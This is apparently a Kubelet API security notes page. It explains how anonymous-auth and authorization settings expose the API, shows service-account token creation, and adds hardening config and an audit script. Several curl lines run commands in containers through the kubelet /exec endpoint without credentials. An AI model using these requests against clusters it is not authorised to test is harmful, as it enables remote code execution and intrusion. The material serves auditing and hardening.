# Accessing Kubelet API

* If `--anonymous-auth` is turned off, you will see a 401 Unauthorized response.
* If `--anonymous-auth` is true and `--authorization-mode` is Webhook, you'll see a 403 Forbidden response with the message `Forbidden (user=system:anonymous, verb=get, resource=nodes, subresource=proxy)`.
* If `--anonymous-auth` is true and `--authorization-mode` is AlwaysAllow, you'll see a list of pods.
* `--port` int32: The port for the Kubelet to serve on. (default 10250)
* `--read-only-port` int32: The read-only port for the Kubelet to serve on with no authentication/authorization (set to 0 to disable). (default 10255)

# API endpoints

* /pods - lists running pods
* /exec - runs a command in a container and returns a link to view the output.
* Other API endpoints not relevant to this post allow port forwarding, fetching logs and viewing metrics.

# Authorization Token

```bash
## kubelet api
# Create a service account and bind it to the built-in kubelet-api-admin role
kubectl create sa kubelet-api-test
kubectl create clusterrolebinding kubelet-api-test --clusterrole=system:kubelet-api-admin --serviceaccount=default:kubelet-api-test
# Read the bearer token out of the service account's auto-created secret
# (on Kubernetes 1.24+ no secret is auto-created; use: kubectl create token kubelet-api-test)
SECRET=$(kubectl get secrets | grep kubelet-api-test | awk '{print $1}')
TOKEN=$(kubectl describe secret ${SECRET} | grep -E '^token' | awk '{print $2}')
echo ${TOKEN}
```

# Examples

```bash
curl -Ssk --header "Authorization: Bearer ${TOKEN}" https://192.168.33.26:10250/metrics
curl -Ssk https://localhost:10250/pods/
curl http://localhost:10255/pods
curl http://localhost:10255/stats/summary
curl http://localhost:10255/metrics

# Running Commands in Containers
curl -skv -X POST -H "X-Stream-Protocol-Version: v2.channel.k8s.io" -H "X-Stream-Protocol-Version: channel.k8s.io" "https://localhost:10250/exec////?command=touch&command=hello_world&input=1&output=1&tty=1"
curl -Gks https://worker:10250/exec/{namespace}/{pod}/{container} -d 'input=1' -d 'output=1' -d 'tty=1' -d 'command=ls' -d 'command=/'
curl -Gks https://worker:10250/exec/kube-system/tiller-797d1b1234-gb6qt/tiller -d 'input=1' -d 'output=1' -d 'tty=1' -d 'command=ls' -d 'command=/'
```

# References

* [Kubelet Anonymous RCE](https://github.com/serain/kubelet-anon-rce)
* [Attacking Kubernetes through Kubelet](https://labs.mwrinfosecurity.com/blog/attacking-kubernetes-through-kubelet/)
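The three response cases listed at the top of this page correspond to kubelet settings. The following is an added example, not part of the original post: two `KubeletConfiguration` fragments (`kubelet.config.k8s.io/v1beta1`, the file-based equivalent of the `--anonymous-auth`, `--authorization-mode` and `--read-only-port` flags), the first reproducing the "list of pods" case, the second the hardened configuration that yields the 401 case and closes port 10255. The CA file path is an assumption.

```yaml
# Added example: weak vs. hardened kubelet configuration (kubelet.config.k8s.io/v1beta1).
# Not from the original post; the clientCAFile path is an assumed value.

# --- weak: produces the "list of pods" case from an anonymous GET /pods ---
apiVersion: kubelet.config.k8s.io/v1beta1
kind: KubeletConfiguration
authentication:
  anonymous:
    enabled: true        # --anonymous-auth=true
authorization:
  mode: AlwaysAllow      # --authorization-mode=AlwaysAllow: every caller is authorized
readOnlyPort: 10255      # --read-only-port=10255: plain HTTP, no auth at all

---
# --- hardened: anonymous callers get 401, authenticated ones are checked by the API server ---
apiVersion: kubelet.config.k8s.io/v1beta1
kind: KubeletConfiguration
authentication:
  anonymous:
    enabled: false       # --anonymous-auth=false
  webhook:
    enabled: true        # bearer tokens are validated with a TokenReview against the API server
  x509:
    clientCAFile: /etc/kubernetes/pki/ca.crt   # assumed path; client certs signed by this CA are accepted
authorization:
  mode: Webhook          # --authorization-mode=Webhook: SubjectAccessReview on nodes/proxy etc. per request
readOnlyPort: 0          # disables port 10255 entirely
```

With `mode: Webhook`, a request that authenticates but lacks RBAC on the `nodes/proxy` subresource gets the 403 shown at the top of the page; the `system:kubelet-api-admin` ClusterRole used in the token section is what grants that access.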
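To turn the curl checks in the Examples section into a repeatable audit of one's own nodes, here is an added bash example (not from the original post) that maps the HTTP status of an unauthenticated `GET /pods` on 10250 and 10255 to the setting each status implies, using the three cases listed at the top of the page. The hostname in the usage comment is an assumption.

```bash
#!/usr/bin/env bash
# Added example: classify a kubelet's answer to an unauthenticated GET /pods.
# Not part of the original post; node names are assumptions.
set -u

# Map the HTTP status of an anonymous request to the kubelet setting it implies
# (the three cases described at the top of the page, plus "no answer").
classify_kubelet_status() {
  case "$1" in
    401) echo "anonymous-auth=false (unauthenticated requests rejected)" ;;
    403) echo "anonymous-auth=true, authorization-mode=Webhook (anonymous allowed in, not authorized)" ;;
    200) echo "anonymous-auth=true, authorization-mode=AlwaysAllow (pod list exposed, fix this)" ;;
    000) echo "no response (port closed or filtered)" ;;
    *)   echo "unexpected status $1" ;;
  esac
}

# Return success only when the status means data is served without authentication.
is_exposed() {
  [ "$1" = "200" ]
}

# Probe one node. -k skips certificate verification because kubelet serving
# certificates are commonly self-signed; -o /dev/null -w prints only the status
# (curl itself prints 000 when the connection fails).
audit_kubelet() {
  local host="$1"
  local https_status ro_status
  https_status=$(curl -sk -o /dev/null -w '%{http_code}' --max-time 5 "https://${host}:10250/pods")
  ro_status=$(curl -s -o /dev/null -w '%{http_code}' --max-time 5 "http://${host}:10255/pods")
  echo "${host}:10250 -> ${https_status}: $(classify_kubelet_status "$https_status")"
  if is_exposed "$ro_status"; then
    echo "${host}:10255 -> ${ro_status}: read-only port enabled, set --read-only-port=0"
  else
    echo "${host}:10255 -> ${ro_status}: read-only port not exposed"
  fi
}

# Usage (hostname is an assumption):
#   audit_kubelet worker-1.example.internal
```

Run `audit_kubelet` once per node name from `kubectl get nodes`; any line reporting `AlwaysAllow` or an enabled read-only port is a node whose kubelet answers the pod-listing and exec requests shown above without credentials.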